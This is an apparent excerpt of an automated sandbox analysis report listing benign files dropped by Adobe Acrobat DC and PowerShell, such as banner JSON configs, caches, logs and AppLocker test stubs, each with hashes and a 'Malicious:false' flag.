                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.26635102311422
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfQ1rPeUkwRe9:YvXKXBA2WYpW7DsGY16Ukee9
                                                                                            MD5:D25B7A68922E403A74702D96732B5E8F
                                                                                            SHA1:C134A2352A04221748DF5F3BA13E796D0F7A4853
                                                                                            SHA-256:3EC4C174166FF9765F9C821EABFE9FE56D75B643F19AE6BB84DF9A954FB9E0CF
                                                                                            SHA-512:9950BCD156A61ED58E3CEC0D6C7750BF9B8DC91386A37C5B839367388CC3EA8DAF4C3EB35CA9F3A22A0669BC4BEA64322012991A71E799F63F9D09395EE8E742
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.286158302998659
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfFldPeUkwRe9:YvXKXBA2WYpW7DsGz8Ukee9
                                                                                            MD5:AF167A34F7412D306C5B4D609848C21C
                                                                                            SHA1:4A78EF1AEB77B1A8717AE112BE0BA4E15166FFCF
                                                                                            SHA-256:1C1D366E47CEB6FA2D9305CD5AC07FCFD29696364D6125C33D676FCDE5254FC6
                                                                                            SHA-512:6E1C51818DF69D170F15807F71B792B450911E3A9051AF2C544026051D4A6C996F00FCC198302C5A89CB96EC1268BD9940F33BA0CFF99104BDA8FF37EE0BB776
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.2913020948981595
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfzdPeUkwRe9:YvXKXBA2WYpW7DsGb8Ukee9
                                                                                            MD5:F2E34DBD26054CE6E146E1F01B995580
                                                                                            SHA1:4B0B12B13669212DA47DF1A0CD7882D5CE8C1D5D
                                                                                            SHA-256:C6619624DEC989CC62C201BA370B09642AABDCFAB5B1626098F39EAA79F697F1
                                                                                            SHA-512:C0B292BFCB3D820166939DEB2DACEAC5772890D45A90CDEB78FBEBCCC6BB2B279E33F8694EEC1789B009E5024DBAA53553DFD53EF56A2D7C6FCBA49AD27F679C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.271640722961253
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfYdPeUkwRe9:YvXKXBA2WYpW7DsGg8Ukee9
                                                                                            MD5:B33301550F7E47166EFEA4E8BCC61188
                                                                                            SHA1:2E6790801534BACCAFD6F8A94B8C4FB9D7E52C7D
                                                                                            SHA-256:98BDA9233F8417517A1FF6752B67DF3908A845546BED3D2C46BA91BDB6F663AF
                                                                                            SHA-512:A4146794F426AECECC9E89902B3304FD5C8FB3F47AEAC14671684DC7AE7F449CBAC6153C087A2EAD8A99B3742B76EA57DAA1DFBCA50777DCCEF21CDD401D100E
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):5.25719181273767
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf+dPeUkwRe9:YvXKXBA2WYpW7DsG28Ukee9
                                                                                            MD5:4D27E2AD3AC99A5D6C84D8261F06F79D
                                                                                            SHA1:96C3DFC8862FE392487ABD387ED3731250EA902C
                                                                                            SHA-256:030F17B7988215A6F98565D8A88D44D474883F9F1F4C747619CAB48858BE9C68
                                                                                            SHA-512:CDCE282E0357E7A1D3B85845FDC66BAB118B6A4B70FBDF5450F73B936AE5DE2B983D6532121E4CCD50E8B7E4B7664F81F2FD03F0B5A2F1C143C56971C625BB85
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.255382729755658
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfbPtdPeUkwRe9:YvXKXBA2WYpW7DsGDV8Ukee9
                                                                                            MD5:4B57851E1E785563168D16C4816A878E
                                                                                            SHA1:B0FE14D3A14B25501A3E2D135BA0C5B1B9B18A0F
                                                                                            SHA-256:3E2885E441DBB32F76398E93EB97E9769D6B117BC4A013BA5FE25343917611AE
                                                                                            SHA-512:5F1FE37E5C54F1CBC065BAF2E11A024CF3CDDFF08B46A52AD6B2ECC4CBAE526EC99EDDB2CA0727D00914E72259D617E3F958B619C123AA726DD142398EA17FB7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):5.256959279881444
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf21rPeUkwRe9:YvXKXBA2WYpW7DsG+16Ukee9
                                                                                            MD5:351DCCD57A894AD2F3D6717D4EEF86D1
                                                                                            SHA1:4C6E2FCE79340F959EB905C919C4DE783588FCFD
                                                                                            SHA-256:4C13C97CF06B944959959632DF4C222BBE216CFA5A669018407564B123F44DCF
                                                                                            SHA-512:EE957EC042E620B5DB0C6A90B2405609B8D65445B145907F76E6F8299603EF5F9BEE44B5BE0F465907ABF86EE763FA466338940440795A16C0ED16187A9C17F3
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1090
                                                                                            Entropy (8bit):5.661432533643792
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6XBbitamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSw1:YvEmBBgkDMUJUAh8cvMw1
                                                                                            MD5:D0ECCA98F0C890053561EEBEE95371DD
                                                                                            SHA1:65D0C8CEA9A1BEADDE10D4E068B46B4CE6701D1A
                                                                                            SHA-256:768B8DF3A3DD9AF94BAD36ECF9D0906E89C5513144E8AD9FBB9478AC639D89DB
                                                                                            SHA-512:DFE6CBEAE7C32184B83F1E0F45B459BC988C2E378D97D960D9E101CEC2D50ED687DA865C4B0D7F8D47B6F112C6F66EA670F5D0E55A88284E6F0D1CF4D419F5E7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):5.2331721708244565
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfshHHrPeUkwRe9:YvXKXBA2WYpW7DsGUUUkee9
                                                                                            MD5:8D787CE6F319D30E52E6B886F9DB6664
                                                                                            SHA1:867EE02CA48B35F538F1EEE79957ABF1852C5780
                                                                                            SHA-256:A38E2C01278EE0A6E190F5E8D62C5A3E18478B40B4CC0FCB28CB3C448AF5033E
                                                                                            SHA-512:C24F59382D47F0343C8EB4C5AAF6C8967A907B5433543370AD03ED741625EF512D976D7F0C17F883AB5967ACD98B42FFB59423F8DB87F4BDB27CDEA8B3B4B095
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):282
                                                                                            Entropy (8bit):5.237754531774581
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJTqgFCrPeUkwRe9:YvXKXBA2WYpW7DsGTq16Ukee9
                                                                                            MD5:C62DB6081BD49F9047533EE70D81AB84
                                                                                            SHA1:B38EA02C1D09DF3E7C9A42DBBA0FF725752FE857
                                                                                            SHA-256:87C88338D2C4473BA98909B7D01CCEF844ED23043E43D122A6F1F2DB904E355B
                                                                                            SHA-512:90CCAF9C4ADCD56E6CC3394B58A97D8B7C4CECE2848D41E9368F83BACD411AEE635EFC2B034338C243C7CE8F0A55DC11EBBF15CDBA77857619BA54A405224A3D
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):0.8112781244591328
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:e:e
                                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                            Malicious:false
                                                                                            Preview:....

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2814
                                                                                            Entropy (8bit):5.126943943536736
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:Y/d2HqU6DWa/OuiptR/9fS8WKJMk+c7RQ89hMGK:GbU6Tip9WKKyO
                                                                                            MD5:7964595FD8746371146F1B3B95FE3137
                                                                                            SHA1:BE964AA7ABF0850257A051FEE2F1539E87CE3706
                                                                                            SHA-256:3D814DEEA520BD1BBCDB43A6AE431010A05C75F8E36E92B6137520B630C3FDF9
                                                                                            SHA-512:80E9A4E474CF602329A6E1C37A9CE8F36412CD3B7D093665851264B6321C12EC79DBB9FA301FAF1866CCDDAB14F41B83773EAF8E14F1D6AB0EEFD6A0981EF7E9
                                                                                            Malicious:false
                                                                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"109ef4a4471f4b5119857b0a8fe8d190","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609093000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a96577b69a5f848e3efa93c1dc915370","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609092000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"fd3c76e5193f838a8175ecfc3ef51609","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609092000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8411618e307f08af273c0c719a749d71","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609092000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ec98e714cc0e1f58fe4dfbdc7792811e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609092000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"da1f161d9f98f15580b92175a07d3327","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):0.985230731706929
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpEg4zJwtNBwtNbRZ6bRZ4VgF:TVl2GL7ms6ggOVpgzutYtp6Pr
                                                                                            MD5:524FC3D2F3910A580D5435AFBF1EE83E
                                                                                            SHA1:B28008F698AF65739C5D8CA92B0C988D27DDE8DC
                                                                                            SHA-256:CD509FECA8BC41CED5619876632A088EDB5D1D19E82264A7E27EAF74E905B78B
                                                                                            SHA-512:F3C3E2DF3A422B91B4A63061E4DE490B41368E7F4C31D9E196D4D48B4FCB198209C1BFA9745219874904C701BE86281245935D5E4F6F5493B52295201388E6D4
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):1.3397472989185633
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7+tEvAD1RZKHs/Ds/SpEgPzJwtNBwtNbRZ6bRZWf1RZK4qLBx/XYKQvGJF7ursI:7MSGgOVpHzutYtp6PMdqll2GL7msI
                                                                                            MD5:814D46FA24CAC873608DE214ED7C44F2
                                                                                            SHA1:78856FF0D2986E49D292336DDC9EB31B17926E97
                                                                                            SHA-256:81B49B97A920D8DFD8F9977994A5CCFC27413AFA9D3CC8487F7954219562EB7D
                                                                                            SHA-512:4D0E3E92FB149348C4337B8981B508F77B6C6186DD63DDAAFC75CAA0E04E438AA03C9243CF12EF39457CA106E70776A16D7FDD562D852AE5DF139FA86BAB833E
                                                                                            Malicious:false
                                                                                            Preview:.... .c.....).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66726
                                                                                            Entropy (8bit):5.392739213842091
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEg8VTEXDmWjHKnUboM9vjc1hnVPEYyu:6a6TZ44ADEHmQKnUEuvjcHnlEK
                                                                                            MD5:72C660CD8A79F93FA201971BC7CAF360
                                                                                            SHA1:C02E76DEF9433BDEFE7C62CAEBBD23D43B4DFA82
                                                                                            SHA-256:0EC597E0F671BD7189A3905479DEDAB8DA71DDD52617875F0A8ADC080AA51673
                                                                                            SHA-512:4BB061191085271B8535BC327F496E7B2A0BA29B2497FFE45380E22D5EF11C46517A57B797598026B922CB8BC6913CD1E1F149DD27B272B36C7A4F6C03FF48EC
                                                                                            Malicious:false
                                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlllul5zR/lL:NllU
                                                                                            MD5:A5504FD0F9BD6D8A85D83E1D0C86FBD1
                                                                                            SHA1:BE7D4EF288DE5F0C413C403ED471E51B574F4081
                                                                                            SHA-256:164D3BF457FA5CF68FE086795A945A8C54AA972FD8B8FA3C2A22EB5B741C1EB7
                                                                                            SHA-512:2D091AA5F1249D860C8FF969FFE7EEE8865C53A3B791E07BBD1E3CEA72355A3502D9E86A7F5055F21149A2ED01C6E77000B541D5432D10AC5F76BB2C017F4550
                                                                                            Malicious:false
                                                                                            Preview:@...e...................................t............@..........

                                                                                            C:\Users\user\AppData\Local\Temp\MSIede9f.LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.5278731006694652
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAiOnH:Qw946cPbiOxDlbYnuRKj
                                                                                            MD5:D44B37C6449BDEA5D364C2AEBF7F4AAA
                                                                                            SHA1:A305B8C5BA1C73ABCCAFCC5E054EAB43583C4692
                                                                                            SHA-256:3AA90415246EED51C5CB8F92ED2D7AFC4C5DD5AF8339E82DCF38E921A64BC93E
                                                                                            SHA-512:44BEA676A603190A2065A67F9B85A621EC507581298C5D518E88C3BE09E9518C202028FC00F3AC19BC4D3446B774E27C2C699BF9824C1E75661A07ADD8EF4D01
                                                                                            Malicious:false
                                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.1.:.3.1. .=.=.=.....

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5nmgag4.i5e.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfbuktda.jii.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2ph5354.jeh.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qasv0lek.o2c.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxcmyagf.cl0.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
